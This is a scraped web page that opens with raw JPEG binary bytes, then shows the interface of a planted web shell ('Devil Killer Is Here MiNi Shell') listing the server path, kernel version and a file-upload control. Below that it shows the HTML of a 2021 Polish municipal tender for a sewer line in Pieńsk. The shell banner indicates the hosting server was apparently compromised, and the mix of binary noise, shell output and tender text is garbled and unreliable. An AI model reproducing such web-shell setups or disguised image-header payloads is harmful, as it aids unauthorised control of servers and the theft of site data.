JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210611/0008079101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00080791 z dnia 2021-06-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w ul. Spacerowej w Pieńsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PIEŃSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821470</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bolesławiecka 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pieńsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757786511-513</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">757786405</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.piensk.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w ul. Spacerowej w Pieńsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-977f9c70-caa1-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00080791</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001735/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa kanalizacji sanitarnej w ul. Spacerowej w Pieńsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.piensk.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja zamawiającego z wykonawcami odbywa się za pomocą środków komunikacji elektronicznej. Komunikacja między zamawiającym a wykonawcami, w tym wszelkie<br/>oświadczenia,wnioski, zawiadomienia oraz informacje przekazywane są w formie elektronicznej przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl/, e PUAPu https://epuap.gov.pl/wps/portal oraz<br/>pocztyelektronicznej, e-mail nowicki@piensk.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i<br/>odbieraniakorespondencji elektronicznej:Zamawiający wymaga, aby w tytule maila był podany nr<br/>sprawy, coułatwi komunikację pomiędzy stronami postępowania. 2) Wszelką korespondencję związaną<br/>zniniejszym postępowaniem, należy przekazywać za pośrednictwem ePUAP lub poczty<br/>elektronicznejna adres: nowicki@piensk.com.pl Korespondencję uważa się za przekazaną w terminie,<br/>jeżeli dotrzedoZamawiającego przed upływem wymaganego terminu. 3) Wykonawca zamierzający<br/>wziąć udziałwpostępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawcaposiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty<br/>lubwnioskuoraz do formularza do komunikacji.4) Wymagania techniczne i organizacyjne wysyłania<br/>iodbieraniakorespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały<br/>wRegulaminiekorzystania z mini Portalu dostępnym<br/>podadresemhttps://miniportal.uzp.gov.pl/WarunkiUslugi.aspxorazRegulaminie e PUAP.5)<br/>Wykonawcaprzystępując do niniejszego postępowania o udzielenie zamówieniapublicznego, akceptuje<br/>warunkikorzystania zmini Portalu, określone w Regulaminie miniPortalu orazzobowiązuje się<br/>korzystając zminiPortalu przestrzegać postanowień tego regulaminu.6) Maksymalnyrozmiar plików<br/>przesyłanych zapośrednictwem dedykowanych formularzy do: złożenia i wycofaniaoferty oraz do<br/>komunikacjiwynosi150 MB.7) Za datę przekazania oferty, oświadczenia, o którym mowaw art. 125 ust.<br/>1 pzp,podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji,oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datęich<br/>przekazania naePUAP.8) W postępowaniu o udzielenie zamówienia korespondencja<br/>elektroniczna(inna niż ofertaWykonawcy i załączniki do oferty)odbywa się elektronicznie za<br/>pośrednictwemdedykowanegoformularza dostępnego na ePUAP oraz udostępnionego przez mini<br/>Portal (Formularz dokomunikacji).Korespondencja przesłana za pomocą tego formularza nie może być<br/>szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługująsięnumerem ogłoszenia (BZP).9) Dokumenty elektroniczne, oświadczenia lub<br/>elektronicznekopiedokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem<br/>Formularzadokomunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składaniadokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń zapomocą pocztyelektronicznej, na adres email: nowicki@piensk.com.pl Sposób<br/>sporządzeniadokumentówelektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musibyć zgody zwymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia2020 r. wsprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznychdladokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu<br/>oudzieleniezamówienia publicznego lub konkursie)10) Zamawiający nie przewiduje<br/>sposobukomunikowania się zWykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej,wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2<br/>RozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych, zwanedalej„RODO”)(Dz.U. UE. L. 119.1 z 04.05.2016) informuję, iż:1) Administratorem danych<br/>osobowychjest PaniAgnieszka Demichowicz Z administratorem można się skontaktować<br/>poprzezadresemail:iod@piensk.com.pl lub pisemnie na adres siedziby<br/>administratora;2)Administratorwyznaczył inspektora ochrony danych, z którym może się Pani/Pan<br/>skontaktowaćpoprzezemailiod@piensk.com.pl Z inspektorem ochrony danych można się kontaktować<br/>wewszystkichsprawach dotyczących przetwarzania danych osobowych oraz korzystania z<br/>prawzwiązanych zprzetwarzaniem danych;3) zgodnie z treścią art. 6ust. 1 lit. c RODO Pani/Pana<br/>daneosoboweprzetwarzane będą w celu realizacji procesu wyboru wykonawcy na<br/>podstawieprowadzonegopostępowania o udzielenie zamówienia publicznego, a następnie realizacji<br/>postanowieńumownychzwiązanych z wykonywanym zamówieniem;4) w związku z przetwarzaniem<br/>Pani/Panadanych w celachwskazanych powyżej, dane osobowe mogą być udostępniane innym<br/>odbiorcom lubkategoriomodbiorców danych osobowych, na podstawie przepisów prawa oraz<br/>zawartych umówpowierzeniaprzetwarzania danych, jeżeli wymagane byłoby to w celu realizacji<br/>postanowieńumownych,5) wodniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane wsposóbzautomatyzowany, stosowanie do art. 22 RODO;6)Pani/Pana dane osobowe<br/>będąprzechowywane,zgodnie z art. 97 ust. 1 ustawy – Prawo zamówień publicznych przez okres 4 lat<br/>oddnia zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza4lata, okresprzechowywania obejmuje cały czas trwania umowy;7) posiada Pani/Pan<br/>prawodo:a)dostępu dodanych osobowych, na podstawie art. 15 RODO, przy czym administrator może<br/>żądaćod osoby, którejdane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanieżądania, wszczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówieniapublicznego;b)sprostowania lub uzupełnienia danych osobowych, na podstawie art.<br/>16RODO, przyczym skorzystaniez niniejszego uprawnienia nie może skutkować zmianą wyniku<br/>postępowania oudzielenie zamówieniapublicznego ani zmianą postanowień umowy w zakresie nie<br/>zgodnym z ustawą–Prawo zamówieńpublicznych;c) ograniczenia przetwarzania danych osobowych, na podstawie art.18RODO, przy czymwystąpienie z żądaniem nie ogranicza przetwarzania danych<br/>osobowych do czasuzakończeniapostępowania o udzielenie zamówienia publicznego;d) wniesienia<br/>skargi do PrezesaUrzędu OchronyDanych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych<br/>osobowych naruszaprzepisyRODO;8) nie przysługuje Pani/Panu prawo do:a)usunięcia lub<br/>przenoszenia danychosobowych,b)wniesienia sprzeciwu wobec przetwarzania danych<br/>osobowych;9)podanie danychosobowych jest konieczne w celu realizacji postępowania o udzielenie<br/>zamówienia publicznego orazrealizacjipostanowień umownych. Niepodanie danych będzie skutkowało<br/>brakiem możliwościrozpatrzenia ofertyzłożonej w postępowaniu oraz zawarcia umowy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ISM.03.271.PN.08.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 214132,30 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa kanalizacji sanitarnej w ul. Spacerowej w Pieńsku”.<br/>W ramach zadania zostaną zrealizowane następujące roboty budowlane:<br/> 1. budowa odcinka kanalizacji sanitarnej przeznaczonej do odprowadzania ścieków bytowo-gospodarczych z terenów przeznaczonych pod zabudowę mieszkaniową,<br/> budowa przyłączy (odczepów) kanalizacji sanitarnej do granicy działek. <br/> Należy wykonać system kanalizacji sanitarnej grawitacyjnej o średnicach kanałów fi 200<br/> i fi160 mm umożliwiający odprowadzenie ścieków, od wszystkich posesji objętych zakresem opracowania. Ścieki z terenu objętego opracowaniem odprowadzane będą do projektowanej studzienki kanalizacji sanitarnej S1 na istniejącej sieci ks200, zlokalizowanej na dz. nr 175. <br/> Kanały odprowadzający ścieki sanitarne o łącznej długości L=224,50 m wykonane będą <br/>z rur PCV-U litych, o sztywności obwodowej SN8 łączonych na uszczelkę. Na sieci kanalizacyjnej zaprojektowano studzienki kanalizacyjne rewizyjne systemowe z kręgów betonowych DN1000, z włazami w klasie D-400 w ilości 6 sztuk oraz studzienki kanalizacyjne tworzywowe DN425 w ilości 2 stuk.<br/> 2. UWAGA: Wszystkie miejsca kolizji z projektowanym uzbrojeniem w obrębie 10 m przed i za kolizją należy wykonać ręcznie. Prace ziemne w obrębie budynku należy wykonać ręcznie. <br/> 3. Nawierzchnie drogi należy odbudować zgodnie z wytycznymi dokumentacji technicznej.<br/>WAŻNE: Szczegółowy zakres robót zawarty jest w dokumentacji technicznej oraz przedmiarze robót. Przedmiar robót stanowi pomoc w określeniu zakresu robót. Przedmiar robót nie jest podstawą ilościową do wyceny oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-09-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin usunięcia wad i usterek w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:<br/> 1) sytuacji ekonomicznej lub finansowej<br/> Warunek będzie uznany za spełniony, jeżeli Wykonawca przedłoży dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 150 000,00 zł (słownie złotych: sto pięćdziesiąt tysięcy 00/100)<br/> 2) zdolności technicznej lub zawodowej:<br/> a) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończone co najmniej jedną robotę budowlaną, polegające na budowie, przebudowie lub rozbudowie sieci kanalizacyjnej o długości nie mniejszej niż 150 mb w jednym zadaniu inwestycyjnym.<br/> b) Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej jedną osobą lub osobami, które będą uczestniczyć w realizacji zamówienia posiadającymi uprawienia zgodnie z wymogami ustawy Prawo budowlane ( tekst jedn.: Dz.U. 2020r. poz. 1333) do pełnienia samodzielnych funkcji technicznych w budownictwie tj. sanitarnej, bez ograniczeń.<br/>W przypadku podmiotów zagranicznych posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się od Wykonawcy, aby osoby te posiadały równoważne uprawnienia do w/w.<br/>Zamawiający uzna uprawnienia równoważne zdobyte na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy– w oparciu o art. 104 ustawy z dnia 7 lipca 1994r. – Prawo budowlane (t.j. Dz. U. 2020 r. poz. 1333).<br/>Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>informacjioDziałalności Gospodarczej, w zakresie art.109 ust.1 pkt 4 ustawy, sporządzonych<br/>niewcześniej niż 3miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu dorejestru lub<br/>ewidencji.2.oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o<br/>brakuprzynależności do tejsamej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r.o<br/>ochronie konkurencji ikonsumentów (t.j. Dz. U. z 2020 r. poz. 1076 ze zm.), z innymwykonawcą, który<br/>złożył odrębną ofertę,ofertę częściową lub wniosek o dopuszczenie doudziału w postępowaniu, albo<br/>oświadczenia oprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymiprzygotowanie oferty,oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniuniezależnie odinnego wykonawcy należącego do tej samej grupy kapitałowej3. W<br/>przypadkuwykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów nazasadach<br/>określonych wart. 118 ustawy, Zamawiający żąda przedstawienia w odniesieniudo tych podmiotów<br/>dokumentwymieniony w pkt IX.4.1).4. Zamawiający żąda od wykonawcy przedstawienia<br/>dokumentówwymienionych w pktIX.4.1), dotyczących podwykonawcy, któremu zamierza powierzyć<br/>wykonanieczęścizamówienia, a który nie jest podmiotem, na którego zdolnościach lub sytuacji<br/>wykonawcapolegana zasadach określonych w art. 118 ustawy.5. W przypadku wykonawców<br/>ubiegających się wspólnie oudzielenie zamówienia, dokumentywymienione w pkt. IX.4.1) winien<br/>dołączyć każdy podmiotwystępujący wspólnie. Dokumentwinien być potwierdzony za zgodność z<br/>oryginałem i złożony w formieelektronicznejopatrzonej podpisem zaufanym lub podpisem osobistym<br/>zgodnie z § 14 ust.3Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020r.<br/>wsprawiepodmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakichmożeżądać zamawiający od wykonawcy.6. Jeżeli wykonawca ma siedzibę lub miejsce<br/>zamieszkania pozaterytorium RzeczpospolitejPolskiej, zamiast dokumentów, o których mowa w pkt<br/>IX.4.1) składadokument lubdokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejscezamieszkania,potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości,jegoaktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami,<br/>jegodziałalnośćgospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzajusytuacji<br/>wynikającej zpodobnej procedury przewidzianej w przepisach miejsca wszczęciatej procedury.<br/>Dokumenty powinnybyć wystawione nie wcześniej niż 3 miesięcy przedupływem terminu składania<br/>ofert.7. Jeżeli w kraju, wktórym wykonawca ma siedzibę lub miejsce zamieszkania 